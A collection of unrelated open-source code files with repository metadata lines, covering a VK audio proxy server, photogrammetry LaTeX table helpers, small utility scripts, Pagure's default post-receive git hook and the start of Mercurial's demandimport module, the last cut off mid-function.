        oa_id = oa_id.replace('.mp3', '')
        url = vw.getAudio(oa_id)
        # Forward size/expiry/type headers from vk before streaming the body.
        headers = vw.s.head(url).headers
        for h in ['content-length', 'expires', 'content-type']:
            response.headers.append(h, headers[h])
        # Hand bottle the raw urllib3 stream so the body is not buffered.
        return vw.s.get(url, stream=True).raw
    else:
        response.headers['Content-Type'] = 'text/plain'
        return 'Empty request'
@route('/' + audiopostfix + '/<oa_id>', method='HEAD')
@route('/' + audiopostfix + '/<oa_id>/<title>', method='HEAD')
def audioHead(oa_id='', title=''):
    """HEAD counterpart of audioStream: forward vk's HEAD response body.

    title is accepted only for URL symmetry with the GET route.
    """
    if oa_id:
        oa_id = oa_id.replace('.mp3', '')
        url = vw.getAudio(oa_id)
        return vw.s.head(url).raw
    else:
        response.headers['Content-Type'] = 'text/plain'
        return 'Empty request'
# Start the bundled WSGI server on the configured host/port.
# (Python 2 print statement.)
print 'Server will started on host %s and port %s' % (host, port)
bottle.debug(False)
wsgiapp = bottle.default_app()
httpd = wsgiserver.Server(wsgiapp, listen=host, port=port)
# NOTE(review): listen/port were already passed to the constructor above;
# these re-assignments look redundant - confirm against the bundled server.
httpd.listen = host
httpd.port = port
httpd.serve_forever()
#TODO: repost
#TODO: player
|
alive-corpse/esvk2pod
|
esvk2pod.py
|
Python
|
gpl-2.0
| 13,449
|
import numpy as np
from math import pi
# File contains helper functions for priniting various protocols
# helper functions for creation of latex tables for the thesis
def GenerateLatexPointsIterationTable(diff, out_file):
    """Write a LaTeX longtable of per-point iteration differences."""
    column_heading = "Pt. no."
    _genDiff(diff, out_file, column_heading)
def GenerateLatexPhotosIterationTable(diff, out_file):
    """Write a LaTeX longtable of per-photo iteration differences."""
    column_heading = "Ph. no."
    _genDiff(diff, out_file, column_heading)
def reprojection_errors(e_repro, prot_fd):
    """Write a small LaTeX table of reprojection-error statistics.

    e_repro -- array of reprojection errors (converted to pixels below).
    prot_fd -- output file path (opened and overwritten here).
    """
    fd = open(prot_fd, "w")
    e_repro = np.absolute(e_repro)
    # 4592 px across 25.1 mm - presumably the camera sensor geometry;
    # TODO confirm these constants against the project's camera model.
    e_repro = e_repro * (4592 / 25.1) # transformation to pixels
    amax = np.amax(e_repro)
    amin = np.amin(e_repro)
    avg = np.average(e_repro)
    fd.write("max. & %8.6f \\\\ \hline \n" % amax)
    fd.write("min. & %8.6f \\\\ \hline \n" % amin)
    fd.write("avg. & %8.6f \\\\ \hline \n" % avg)
    perc = [90, 75, 50, 25, 10]
    for p in perc:
        pr = np.percentile(e_repro, p, axis=0)
        fd.write("perc. %d & %8.6f \\\\ \hline \n" % (p, pr))
    fd.close()
    # NOTE(review): returns the last percentile *level* (always 10), not a
    # computed statistic - looks unintentional; check callers before changing.
    return p
def GetStats(diff):
    """Return [avg-row, max-row] of the column-wise absolute values of
    *diff*, with the first cell of each row replaced by a text label."""
    magnitudes = np.absolute(diff)
    avg_row = list(np.average(magnitudes, axis = 0))
    max_row = list(np.amax(magnitudes, axis = 0))
    avg_row[0] = "avg."
    max_row[0] = "max."
    return [avg_row, max_row]
def GenerateLatexPhotosAnglesIterationTable(diff, out_file):
    """Write a LaTeX longtable of per-photo angle differences, with the
    columns regrouped so all iterations of each angle sit side by side.

    diff -- 2-D array: column 0 is the photo id, followed by 3 angle
            columns per iteration; angle values are in radians and are
            printed in degrees.
    out_file -- path of the .tex fragment to (over)write.
    """
    fd = open(out_file, "w")
    r, c = diff.shape
    # sort rows by photo id
    diff = diff[diff[:,0].argsort(axis=0)]
    fd.write("\\begin{center} \n")
    fd.write("\\rowcolors{1}{Gray}{white} \n")
    fd.write("\\begin{longtable}{| c || \n")
    ncols = c
    # BUG FIX: use '//' so the integer-division semantics of the original
    # Python 2 '/' are kept and range() does not receive a float on Python 3.
    for i in range(3):
        for j in range( (ncols - 1) // 3):
            if j == 0:
                fd.write("c || ")
            else:
                fd.write("c | ")
    fd.write("} \n")
    fd.write("\hline \n")
    fd.write("Photo no. & ")
    for i in range(3):
        for j in range( (ncols - 1) // 3):
            if j == 0:
                fd.write("\\textbf{Bef. BBA}}")
            else:
                fd.write("\\textbf{It. %d}}" % (j))
            if i * (j-1) < 3 * (ncols - 1):
                fd.write(" & ")
    fd.write("\\\\ \hline \n")
    # Regroup data columns from iteration-major to angle-major order.
    new_diff = np.array(diff)
    width = (diff.shape[1] - 1) // 3
    for i, col in enumerate(diff.T):
        if i == 0:
            continue
        mod_col = (i + 2) % 3
        step = (i - 1) // 3
        shift = mod_col * width
        new_diff[:, shift + step + 1] = col
    for i_row, row in enumerate(new_diff):
        mod_row = (i_row) % 3
        for i, col in enumerate(row):
            if i == 0:
                fd.write("%d & " % col)
                continue
            # radians -> degrees for display
            fd.write("%6.3f " % (col * 180 / pi))
            if i < (len(row) - 1):
                fd.write(" & ")
        fd.write("\\\\ \hline \n")
    # summary rows (avg./max. of absolute values)
    stats = GetStats(new_diff)
    for i_row, row in enumerate(stats):
        mod_row = (i_row) % 3
        for i, col in enumerate(row):
            if i == 0:
                fd.write("%s & " % col)
                continue
            fd.write("%6.3f " % (col * 180 / pi))
            if i < (len(row) - 1):
                fd.write(" & ")
        fd.write("\\\\ \hline \n")
    fd.write("\hline \n")
    fd.write("\end{longtable}\n")
    fd.write("\end{center}\n")
    fd.close()
def _genDiff(diff, out_file, name):
    """Write a LaTeX longtable of per-row iteration differences.

    diff -- 2-D array: column 0 is a row id, remaining columns hold one
            value per iteration.
    out_file -- path of the .tex fragment to (over)write.
    name -- heading for the id column (e.g. "Pt. no." / "Ph. no.").
    """
    fd = open(out_file, "w")
    r, c = diff.shape
    # sort rows by id
    diff = diff[diff[:,0].argsort(axis=0)]
    fd.write("\\begin{longtable}{| c || \n")
    for i in range(c - 1):
        fd.write("c | ")
    fd.write("} \n")
    fd.write("\hline \n")
    # header row: id column, then "before adjustment" plus one per iteration
    for i in range(c):
        if i == 0:
            fd.write(name)
        elif i == 1:
            fd.write("Bef. I.")
        else:
            fd.write("I. %d " % (i - 1))
        if i != c - 1:
            fd.write("&")
    fd.write("\\\\ \hline \n")
    for row in diff:
        for i, col in enumerate(row):
            if i == 0:
                fd.write("%d " % col)
            else:
                fd.write("%6.3f " % col)
            if i != c - 1:
                fd.write(" & ")
        fd.write("\\\\ \hline \n")
    # summary rows (avg./max. of absolute values)
    stats = GetStats(diff)
    for row in stats:
        for i, col in enumerate(row):
            if i == 0:
                fd.write("%s " % col)
            else:
                fd.write("%6.3f " % col)
            if i != len(row) - 1:
                fd.write("&")
        fd.write("\\\\ \hline \n")
    fd.write("\hline \n")
    fd.write("\end{longtable}\n")
    # NOTE(review): closes a {center} environment that is never opened in
    # this function - confirm whether callers wrap the output themselves.
    fd.write("\end{center}\n")
    fd.close()
def CreateParametersLatex(i_num, cov, Xa, dx, bi, apo, prot_fd, unk, gcps, free_net, l):
    """Write adjusted tie-point parameters and std. deviations as LaTeX rows.

    Xa -- adjusted unknowns vector; cov -- its covariance matrix.
    bi/apo/unk -- bundle-adjustment index/column-layout/unknown descriptors.
    prot_fd -- output file path (opened and overwritten here).
    i_num, dx, gcps, free_net, l are accepted for signature parity with the
    other protocol writers and are not all used here.
    """
    fd = open(prot_fd, "w")
    # standard deviations from the covariance diagonal
    sigmas = np.sqrt(np.diagonal(cov))
    def _getDt(Xa, dx, sigmas, unk_l, x_col, pt):
        # one table row: point id, then (value, sigma) for each unknown
        dt = [pt.GetId()]
        for i, un in enumerate(unk_l):
            val = Xa[x_col + i]
            s = sigmas[x_col + i]
            if un in ['ph', 'om', 'ka']:
                # angle unknowns are stored in radians; print degrees
                val = val * 180 / pi
                s = s * 180 / pi
            dt.append(val)
            dt.append(s)
        return dt
    #diff = diff[numpy.lexsort(diff[:,0])]
    dts = []
    pt_step = len(unk.pt)
    for pt_idx in range(bi.tie_pts_n):
        pt = bi.idxs_pts[pt_idx]
        # column of this point's first unknown inside Xa
        pt_x_col = apo.pt_0col + pt_idx * pt_step
        dts.append(_getDt(Xa, dx, sigmas, unk.pt, pt_x_col, pt))
    dts = np.array(dts)
    # sort output rows by point id
    dts = dts[dts[:,0].argsort(axis=0)]
    for d in dts:
        for i, c in enumerate(d):
            if i == 0:
                fd.write("%d " % (c))
            else:
                fd.write("%10.3f " % (c))
            if i < len(d) - 1:
                fd.write(" & ")
        fd.write(" \\\\ \hline \n")
    fd.close()
def CreatePhootoParametersLatex(i_num, cov, Xa, dx, bi, apo, prot_fd, unk, gcps, free_net, l):
    """Write per-photo exterior-orientation parameters and sigmas as LaTeX rows.

    NOTE(review): "Phooto" looks like a typo for "Photo", but the name is
    part of the public interface and is therefore kept.
    prot_fd -- output file path (opened and overwritten here).
    """
    fd = open(prot_fd, "w")
    # standard deviations from the covariance diagonal
    sigmas = np.sqrt(np.diagonal(cov))
    def _printFeature(Xa, dx, sigmas, unk_l, x_col, ph):
        # one table row: photo id, then (value, sigma) for each unknown
        fd.write("%d &" % (ph.GetId()))
        for i, un in enumerate(unk_l):
            val = Xa[x_col + i]
            s = sigmas[x_col + i]
            if un in ['ph', 'om', 'ka']:
                # angle unknowns are stored in radians; print degrees
                val = val * 180 / pi
                s = s * 180 / pi
            fd.write("%10.3f & %10.3f " % (val, s))
            if i < len(unk_l) - 1:
                fd.write(" & ")
        fd.write(" \\\\ \hline \n")
    ph_step = len(unk.ph)
    for ph_idx in range(bi.photos_n):
        ph = bi.idxs_phs[ph_idx]
        # column of this photo's first unknown inside Xa
        ph_x_col = apo.ph_0col + ph_idx * ph_step
        _printFeature(Xa, dx, sigmas, unk.ph, ph_x_col, ph)
    fd.close()
# functions for creation of adjustment protocols
def CreateIterationProtocolMeasurements(i_num, cov_l, e_repro, bi, prot_fd):
    """Append one iteration's per-measurement sigmas and reprojection errors.

    cov_l -- covariance of the observations (two rows/cols per image point).
    e_repro -- reprojection error vector with the same 2-per-point layout.
    prot_fd -- already-open, writable protocol file object.
    """
    prot_fd.write(_('\n\n\n\n*********************************************************************'))
    prot_fd.write(_('\n\nIteration: %d\n\n' % (i_num + 1)))
    sigmas = np.sqrt(np.diagonal(cov_l))
    prev_ph = None
    for i, d in enumerate(bi.Lrows_idxs):
        cam, ph, pt, v = d
        # each image point occupies two consecutive entries (x and y)
        i1 = i * 2
        i2 = i * 2 + 1
        if prev_ph is None or prev_ph != ph:
            # start a new section whenever the photo changes
            prev_ph = ph
            prot_fd.write("\n\nPhoto %10d:\n" % (ph.GetId()))
        phpt = pt.GetPhotoPoints()[ph]
        prot_fd.write("%10d: %10.4f %10.4f " % (pt.GetId(), phpt[0], phpt[1], ))
        prot_fd.write("%10.4f %10.4f" % (sigmas[i1], sigmas[i2]))
        prot_fd.write("%10.4f %10.4f" % (e_repro[i1], e_repro[i2]))
        prot_fd.write("\n")
def CreateParametersIterationProtocol(i_num, cov, Xa, dx, bi, apo, prot_fd, unk, gcps, free_net, l):
    """Append one iteration's adjusted parameters to the protocol file.

    Writes ground-control-point residuals, then interior orientation,
    exterior orientation and object-point results (adjusted value,
    correction and sigma per unknown).
    prot_fd -- already-open, writable protocol file object.
    """
    prot_fd.write(_('\n\n\n\n*********************************************************************'))
    prot_fd.write(_('\n\nIteration: %d\n\n' % (i_num + 1)))
    prot_fd.write(_('Ground control point differences:\n'))
    sigmas = np.sqrt(np.diagonal(cov))
    #sigmas = None
    prot_fd.write("%10s, %10s\n" % ("gcp id", "diff"))
    for gcp in gcps.itervalues():
        # skip points without coordinates, and check points unless free net
        if gcp.GetCoords() is None or ( not gcp.GetGcp()[1] and not free_net):
            continue
        dist = np.linalg.norm(gcp.GetGcp()[0] - gcp.GetCoords())
        bingo_dist = np.linalg.norm(gcp.GetGcp()[0] - gcp.GetResultCoords())
        # NOTE(review): the next two writes repeat the id/dist columns on the
        # same line - the first write looks like a leftover; confirm.
        prot_fd.write("%10d, %10.4f" % (gcp.GetId(), dist))
        prot_fd.write("%10d, %10.4f, %10.4f" % (gcp.GetId(), dist, bingo_dist))
        prot_fd.write("\n")
    prot_fd.write("\n\n")
    cam_step = len(unk.cam)
    ph_step = len(unk.ph)
    pt_step = len(unk.pt)
    def _printParamsLine(x, unk_l, x_col):
        # one row of values for the unknowns starting at column x_col
        for i, un in enumerate(unk_l):
            val = x[x_col + i]
            if un in ['ph', 'om', 'ka']:
                # NOTE(review): converts with 200/pi (gradians) while the
                # LaTeX helpers above use 180/pi (degrees) - confirm units.
                val = val * 200 / pi
            prot_fd.write("%15.4f" % (val))
    def _printParamCaptions(unk_l):
        # header row naming each unknown
        for i, un in enumerate(unk_l):
            prot_fd.write("%15s" % (un))
        prot_fd.write("\n\n")
    def _printFeature(Xa, dx, sigmas, unk_l, x_col):
        # three rows per feature: adjusted value, correction, sigma
        _printParamsLine(Xa, unk_l, x_col)
        prot_fd.write("\n")
        _printParamsLine(dx, unk_l, x_col)
        prot_fd.write("\n")
        _printParamsLine(sigmas, unk_l, x_col)
        prot_fd.write("\n\n")
    prot_fd.write(_('Interior orientaitons adjustment results\n'))
    for cam_idx in range(bi.cams_n):
        if cam_idx == 0:
            _printParamCaptions(unk.cam)
        # NOTE(review): indexes the *photo* table with a camera index -
        # presumably meant bi.idxs_cams; verify before relying on GetId().
        cam = bi.idxs_phs[cam_idx]
        prot_fd.write(_("Camera %d\n" % cam.GetId()))
        cam_x_col = apo.cam_0col + cam_idx * cam_step
        _printFeature(Xa, dx, sigmas, unk.cam, cam_x_col)
    prot_fd.write(_('Exterior orientaitons adjustment results\n'))
    for ph_idx in range(bi.photos_n):
        if ph_idx == 0:
            _printParamCaptions(unk.ph)
        ph = bi.idxs_phs[ph_idx]
        prot_fd.write(_("Photo %d\n" % ph.GetId()))
        ph_x_col = apo.ph_0col + ph_idx * ph_step
        _printFeature(Xa, dx, sigmas, unk.ph, ph_x_col)
    prot_fd.write(_('Object points orientaitons adjustment results\n'))
    for pt_idx in range(bi.tie_pts_n):
        if pt_idx == 0:
            _printParamCaptions(unk.pt)
        pt = bi.idxs_pts[pt_idx]
        prot_fd.write(_("Point %d\n" % pt.GetId()))
        pt_x_col = apo.pt_0col + pt_idx * pt_step
        _printFeature(Xa, dx, sigmas, unk.pt, pt_x_col)
|
ostepok/grass-gis-bba
|
src/i.ortho.bba/protocols.py
|
Python
|
gpl-2.0
| 10,236
|
# Minimal smoke-test script: prints a greeting (Python 2 print statement).
print "Hello CPP!"
|
dkleissa/cpp_2014
|
helloworld.py
|
Python
|
gpl-2.0
| 18
|
#!/usr/bin/python
'''
transpose tsv so that columns headings become row headings

Usage: transpose_tsv.py <input.tsv>
Writes the transposed TSV to stdout.
'''
import sys
import numpy as np
# dtype=object keeps every cell as an uninterpreted string, so no numeric
# parsing or reformatting happens; transpose swaps rows and columns.
data = np.transpose(np.genfromtxt(sys.argv[1],dtype=object,delimiter='\t'))
np.savetxt(sys.stdout,data,fmt='%s',delimiter='\t')
|
eastmallingresearch/crosslink
|
compare_progs/transpose_tsv.py
|
Python
|
gpl-2.0
| 247
|
# -*- coding: utf-8 -*-
"""
(c) 2016-2017 - Copyright Red Hat Inc
Authors:
Pierre-Yves Chibon <pingou@pingoured.fr>
"""
from __future__ import unicode_literals, print_function, absolute_import
import logging
import pygit2
import six
import pagure.config
import pagure.exceptions
import pagure.lib.query
import pagure.lib.tasks
import pagure.lib.tasks_services
import pagure.utils
from pagure.hooks import BaseHook, BaseRunner
_config = pagure.config.reload_config()
_log = logging.getLogger(__name__)
def send_fedmsg_notifications(project, topic, msg):
    """ If the user or admin asked for fedmsg notifications on commit, this will
    do it.

    Publishes *msg* on *topic* via fedmsg and/or fedora-messaging when the
    instance always publishes or the project's Fedmsg hook is active.
    """
    fedmsg_hook = pagure.lib.plugins.get_plugin("Fedmsg")
    # make sure the plugin's DB model is registered so project.fedmsg_hook works
    fedmsg_hook.db_object()
    always_fedmsg = _config.get("ALWAYS_FEDMSG_ON_COMMITS") or None
    # Send fedmsg and fedora-messaging notification
    # (if fedmsg and fedora-messaging are there and set-up)
    if always_fedmsg or (project.fedmsg_hook and project.fedmsg_hook.active):
        if _config.get("FEDMSG_NOTIFICATIONS", True):
            try:
                print(" - to fedmsg")
                # imported lazily so fedmsg stays an optional dependency
                import fedmsg
                config = fedmsg.config.load_config([], None)
                config["active"] = True
                config["endpoints"]["relay_inbound"] = config["relay_inbound"]
                fedmsg.init(name="relay_inbound", **config)
                pagure.lib.notify.fedmsg_publish(topic=topic, msg=msg)
            except Exception:
                _log.exception(
                    "Error sending fedmsg notifications on commit push"
                )
        if _config.get("FEDORA_MESSAGING_NOTIFICATIONS", False):
            try:
                print(" - to fedora-message")
                pagure.lib.notify.fedora_messaging_publish(topic, msg)
            except Exception:
                _log.exception(
                    "Error sending fedora-messaging notifications on "
                    "commit push"
                )
def send_stomp_notifications(project, topic, msg):
    """ If the user or admin asked for stomp notifications on commit, this will
    do it.

    NOTE(review): the opt-in check reuses project.fedmsg_hook rather than a
    stomp-specific flag - presumably intentional (one "notify" switch), but
    worth confirming.
    """
    always_stomp = _config.get("ALWAYS_STOMP_ON_COMMITS") or None
    # Send stomp notification (if stomp is there and set-up)
    if always_stomp or (project.fedmsg_hook and project.fedmsg_hook.active):
        try:
            print(" - to stomp")
            pagure.lib.notify.stomp_publish(topic, msg)
        except Exception:
            _log.exception("Error sending stomp notifications on commit push")
def send_mqtt_notifications(project, topic, msg):
    """ If the user or admin asked for mqtt notifications on commit, this will
    do it.

    Publishes *msg* on *topic* over MQTT when the instance always publishes
    or the project's notification hook is active.
    """
    always_mqtt = _config.get("ALWAYS_MQTT_ON_COMMITS") or None
    # Send mqtt notification (if mqtt is there and set-up)
    if always_mqtt or (project.fedmsg_hook and project.fedmsg_hook.active):
        try:
            print(" - to mqtt")
            pagure.lib.notify.mqtt_publish(topic, msg)
        except Exception:
            # BUG FIX: this log line previously said "stomp"; this is the
            # MQTT path (copy-paste from send_stomp_notifications).
            _log.exception("Error sending mqtt notifications on commit push")
def send_webhook_notifications(project, topic, msg):
    """ If the user asked for webhook notifications on commit, this will
    do it.

    Queues an async web-hook delivery task when the project has the
    'Web-hooks' setting enabled.
    """
    if project.settings.get("Web-hooks"):
        try:
            print(" - to web-hooks")
            # delivery happens asynchronously via the celery task queue
            pagure.lib.tasks_services.webhook_notification.delay(
                topic=topic,
                msg=msg,
                namespace=project.namespace,
                name=project.name,
                user=project.user.username if project.is_fork else None,
            )
        except Exception:
            _log.exception(
                "Error sending web-hook notifications on commit push"
            )
def send_notifications(session, project, repodir, user, refname, revs, forced):
    """ Send out-going notifications about the commits that have just been
    pushed.

    session -- database session used to resolve commit authors.
    project -- project object (or its string name) receiving the push.
    repodir -- path of the git repository on disk.
    user -- username of the pusher; refname -- branch name pushed to.
    revs -- list of pushed commit hashes; forced -- True for a force-push.
    """
    auths = set()
    for rev in revs:
        # map each commit author to a pagure user when the email is known,
        # otherwise fall back to the raw author name
        email = pagure.lib.git.get_author_email(rev, repodir)
        name = pagure.lib.git.get_author(rev, repodir)
        author = pagure.lib.query.search_user(session, email=email) or name
        auths.add(author)
    authors = []
    for author in auths:
        # Only use the JSON of the user if the user exists in the DB
        if not isinstance(author, six.string_types):
            author = author.to_json(public=True)
        authors.append(author)
    if revs:
        # oldest commit first in the published message
        revs.reverse()
        print("* Publishing information for %i commits" % len(revs))
        topic = "git.receive"
        msg = dict(
            total_commits=len(revs),
            start_commit=revs[0],
            end_commit=revs[-1],
            branch=refname,
            forced=forced,
            authors=list(authors),
            agent=user,
            repo=project.to_json(public=True)
            if not isinstance(project, six.string_types)
            else project,
        )
        # Send blink notification to any 3rd party plugins, if there are any
        pagure.lib.notify.blinker_publish(topic, msg)
        # external brokers are only notified for public projects
        if not project.private:
            send_fedmsg_notifications(project, topic, msg)
            send_stomp_notifications(project, topic, msg)
            send_mqtt_notifications(project, topic, msg)
        send_webhook_notifications(project, topic, msg)
    if (
        _config.get("PAGURE_CI_SERVICES")
        and project.ci_hook
        and project.ci_hook.active_commit
        and not project.private
    ):
        # trigger a CI build for the newest pushed commit
        pagure.lib.tasks_services.trigger_ci_build.delay(
            project_name=project.fullname,
            cause=revs[-1],
            branch=refname,
            ci_type=project.ci_hook.ci_type,
            branch_to=None,
        )
def inform_pull_request_urls(
    session, project, commits, refname, default_branch
):
    """ Inform the user about the URLs to open a new pull-request or visit
    the existing one.

    Prints the links on the pusher's terminal (git relays hook stdout).
    Returns the list of UIDs of the open pull-requests found for *refname*.
    """
    target_repo = project
    # for forks, pull-requests are filed against the parent project
    if project.is_fork:
        target_repo = project.parent
    pr_uids = []
    if (
        commits
        and refname != default_branch
        and target_repo.settings.get("pull_requests", True)
    ):
        print()
        # open PRs from the target repo with this branch as source
        prs = pagure.lib.query.search_pull_requests(
            session,
            project_id_from=target_repo.id,
            status="Open",
            branch_from=refname,
        )
        if project.id != target_repo.id:
            # also include PRs originating from the fork itself
            prs.extend(
                pagure.lib.query.search_pull_requests(
                    session,
                    project_id_from=project.id,
                    status="Open",
                    branch_from=refname,
                )
            )
        # Link to existing PRs if there are any
        seen = len(prs) != 0
        for pr in prs:
            # Refresh the PR in the db and everywhere else where needed
            pagure.lib.tasks.update_pull_request.delay(pr.uid)
            # Link tickets with pull-requests if the commit mentions it
            pagure.lib.tasks.link_pr_to_ticket.delay(pr.uid)
            # Inform the user about the PR
            print("View pull-request for %s" % refname)
            print(
                "   %s/%s/pull-request/%s"
                % (_config["APP_URL"].rstrip("/"), pr.project.url_path, pr.id)
            )
            pr_uids.append(pr.uid)
        # If no existing PRs, provide the link to open one
        if not seen:
            print("Create a pull-request for %s" % refname)
            print(
                "   %s/%s/diff/%s..%s"
                % (
                    _config["APP_URL"].rstrip("/"),
                    project.url_path,
                    default_branch,
                    refname,
                )
            )
        print()
    return pr_uids
class DefaultRunner(BaseRunner):
    """ Runner for the default hook.

    Dispatches post-receive processing for every push: commit logging,
    notifications, PR bookkeeping and repo garbage collection.
    """

    @staticmethod
    def post_receive(session, username, project, repotype, repodir, changes):
        """ Run the default post-receive hook.

        For args, see BaseRunner.runhook.
        """
        # Docs/tickets/requests repos are ignored by this hook.
        if repotype != "main":
            if _config.get("HOOK_DEBUG", False):
                print("Default hook only runs on the main project repository")
            return
        if changes:
            # Retrieve the default branch
            repo_obj = pygit2.Repository(repodir)
            default_branch = None
            if not repo_obj.is_empty and not repo_obj.head_is_unborn:
                default_branch = repo_obj.head.shorthand
            pr_uids = []
            for refname in changes:
                (oldrev, newrev) = changes[refname]
                forced = False
                # newrev of all zeros means the ref is being deleted
                if set(newrev) == set(["0"]):
                    print(
                        "Deleting a reference/branch, so we won't run the "
                        "pagure hook"
                    )
                    return
                # oldrev of all zeros means a brand new ref
                elif set(oldrev) == set(["0"]):
                    oldrev = "^%s" % oldrev
                elif pagure.lib.git.is_forced_push(oldrev, newrev, repodir):
                    forced = True
                    # On a forced push, diff from the merge base instead
                    base = pagure.lib.git.get_base_revision(
                        oldrev, newrev, repodir
                    )
                    if base:
                        oldrev = base[0]
                refname = refname.replace("refs/heads/", "")
                commits = pagure.lib.git.get_revs_between(
                    oldrev, newrev, repodir, refname
                )
                log_all = _config.get("LOG_ALL_COMMITS", False)
                if log_all or refname == default_branch:
                    print(
                        "Sending to redis to log activity and send commit "
                        "notification emails"
                    )
                else:
                    print("Sending to redis to send commit notification emails")
                # This is logging the commit to the log table in the DB so we can
                # render commits in the calendar heatmap.
                # It is also sending emails about commits to people using the
                # 'watch' feature to be made aware of new commits.
                pagure.lib.tasks_services.log_commit_send_notifications.delay(
                    name=project.name,
                    commits=commits,
                    abspath=repodir,
                    branch=refname,
                    default_branch=default_branch,
                    namespace=project.namespace,
                    username=project.user.user if project.is_fork else None,
                )
                # This one is sending fedmsg and web-hook notifications for project
                # that set them up
                send_notifications(
                    session, project, repodir, username, refname, commits, forced
                )
                # Now display to the user if this isn't the default branch links to
                # open a new pr or review the existing one
                pr_uids.extend(
                    inform_pull_request_urls(
                        session, project, commits, refname, default_branch
                    )
                )
            # Refresh of all opened PRs
            parent = project.parent or project
            if _config.get("GIT_HOOK_DB_RO", False):
                # DB is read-only from the hook: delegate to a worker task
                pagure.lib.tasks.refresh_pr_cache(
                    parent.name,
                    parent.namespace,
                    parent.user.user if parent.is_fork else None,
                    but_uids=pr_uids,
                )
            else:
                pagure.lib.tasks.refresh_pr_cache.delay(
                    parent.name,
                    parent.namespace,
                    parent.user.user if parent.is_fork else None,
                    but_uids=pr_uids,
                )
        # repospanner-backed repos are GC'ed elsewhere
        if not project.is_on_repospanner and _config.get(
            "GIT_GARBAGE_COLLECT", False
        ):
            pagure.lib.tasks.git_garbage_collect.delay(
                project.repopath("main")
            )
class Default(BaseHook):
    """ Default hooks. """

    # Hook identifier and description (shown in the project settings UI)
    name = "default"
    description = (
        "Default hooks that should be enabled for each and every project."
    )
    # Runner class invoked on post-receive
    runner = DefaultRunner

    @classmethod
    def is_enabled_for(cls, project):
        # The default hook applies to every project, unconditionally.
        return True
|
pypingou/pagure
|
pagure/hooks/default.py
|
Python
|
gpl-2.0
| 12,080
|
# Portions Copyright (c) Meta Platforms, Inc. and affiliates.
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2.
# demandimport.py - global demand-loading of modules for Mercurial
#
# Copyright 2006, 2007 Matt Mackall <mpm@selenic.com>
#
# This software may be used and distributed according to the terms of the
# GNU General Public License version 2 or any later version.
"""
demandimport - automatic demandloading of modules
To enable this module, do:
import demandimport; demandimport.enable()
Imports of the following forms will be demand-loaded:
import a, b.c
import a.b as c
from a import b,c # a will be loaded immediately
These imports will not be delayed:
from a import *
b = __import__(a)
"""
from __future__ import absolute_import
# pyre-fixme[21]: Could not find `__builtin__`.
import __builtin__ as builtins
import contextlib
import sys
contextmanager = contextlib.contextmanager
_origimport = __import__
nothing = object()
def _hgextimport(importfunc, name, globals, *args, **kwargs):
    """Import ``name`` through ``importfunc``; on failure, retry with the
    ``hgext_`` prefix when the importing module lives in that namespace."""
    try:
        return importfunc(name, globals, *args, **kwargs)
    except ImportError:
        if not globals:
            raise
        # extensions are loaded with "hgext_" prefix
        prefixed = "hgext_%s" % name
        rootof = lambda modname: modname.split(".", 1)[0]
        # Only retry when the requester shares the "hgext_" name root.
        if rootof(prefixed) != rootof(globals.get("__name__", "")):
            raise
        # retry to import with "hgext_" prefix
        return importfunc(prefixed, globals, *args, **kwargs)
class _demandmod(object):
    """module demand-loader and proxy

    Specify 1 as 'level' argument at construction, to import module
    relatively.
    """

    def __init__(self, name, globals, locals, level):
        # Split "a.b": only the head module "a" is imported on load; the
        # tail "b" is queued in ``after`` and attached by subload().
        if "." in name:
            head, rest = name.split(".", 1)
            after = [rest]
        else:
            head = name
            after = []
        # object.__setattr__ bypasses this class' own __setattr__, which
        # would otherwise trigger an immediate load.
        object.__setattr__(self, r"_data", (head, globals, locals, after, level, set()))
        object.__setattr__(self, r"_module", None)

    def _extend(self, name):
        """add to the list of submodules to load"""
        self._data[3].append(name)

    def _addref(self, name):
        """Record that the named module ``name`` imports this module.

        References to this proxy class having the name of this module will be
        replaced at module load time. We assume the symbol inside the importing
        module is identical to the "head" name of this module. We don't
        actually know if "as X" syntax is being used to change the symbol name
        because this information isn't exposed to __import__.
        """
        self._data[5].add(name)

    def _load(self):
        # Perform the real import once; subsequent calls are no-ops.
        if not self._module:
            head, globals, locals, after, level, modrefs = self._data
            mod = _hgextimport(_origimport, head, globals, locals, None, level)
            if mod is self:
                # In this case, _hgextimport() above should imply
                # _demandimport(). Otherwise, _hgextimport() never
                # returns _demandmod. This isn't intentional behavior,
                # in fact. (see also issue5304 for detail)
                #
                # If self._module is already bound at this point, self
                # should be already _load()-ed while _hgextimport().
                # Otherwise, there is no way to import actual module
                # as expected, because (re-)invoking _hgextimport()
                # should cause same result.
                # This is reason why _load() returns without any more
                # setup but assumes self to be already bound.
                mod = self._module
                assert mod and mod is not self, "%s, %s" % (self, mod)
                return

            # load submodules
            def subload(mod, p):
                h, t = p, None
                if "." in p:
                    h, t = p.split(".", 1)
                if getattr(mod, h, nothing) is nothing:
                    setattr(mod, h, _demandmod(p, mod.__dict__, mod.__dict__, level=1))
                elif t:
                    subload(getattr(mod, h), t)

            for x in after:
                subload(mod, x)

            # Replace references to this proxy instance with the actual module.
            if locals:
                if locals.get(head) is self:
                    locals[head] = mod
                elif locals.get(head + r"mod") is self:
                    locals[head + r"mod"] = mod

            for modname in modrefs:
                modref = sys.modules.get(modname, None)
                if modref and getattr(modref, head, None) is self:
                    setattr(modref, head, mod)

            object.__setattr__(self, r"_module", mod)

    def __repr__(self):
        if self._module:
            return "<proxied module '%s'>" % self._data[0]
        return "<unloaded module '%s'>" % self._data[0]

    def __call__(self, *args, **kwargs):
        # Calling a module makes no sense; fail loudly without loading.
        raise TypeError("%s object is not callable" % repr(self))

    def __getattr__(self, attr):
        # Any attribute access forces the real import.
        self._load()
        return getattr(self._module, attr)

    def __setattr__(self, attr, val):
        self._load()
        setattr(self._module, attr, val)

    @property
    def __dict__(self):
        self._load()
        return self._module.__dict__

    @property
    def __doc__(self):
        self._load()
        return self._module.__doc__
_pypy = "__pypy__" in sys.builtin_module_names
def _demandimport(name, globals=None, locals=None, fromlist=None, level=-1):
    """Replacement for __import__ that returns _demandmod proxies where the
    import can safely be delayed until first attribute access."""
    if locals is None or name in ignore or fromlist == ("*",):
        # these cases we can't really delay
        return _hgextimport(_origimport, name, globals, locals, fromlist, level)
    elif not fromlist:
        # import a [as b]
        if "." in name:  # a.b
            base, rest = name.split(".", 1)
            # email.__init__ loading email.mime
            if globals and globals.get("__name__", None) == base:
                return _origimport(name, globals, locals, fromlist, level)
            # if a is already demand-loaded, add b to its submodule list
            if base in locals:
                if isinstance(locals[base], _demandmod):
                    locals[base]._extend(rest)
                return locals[base]
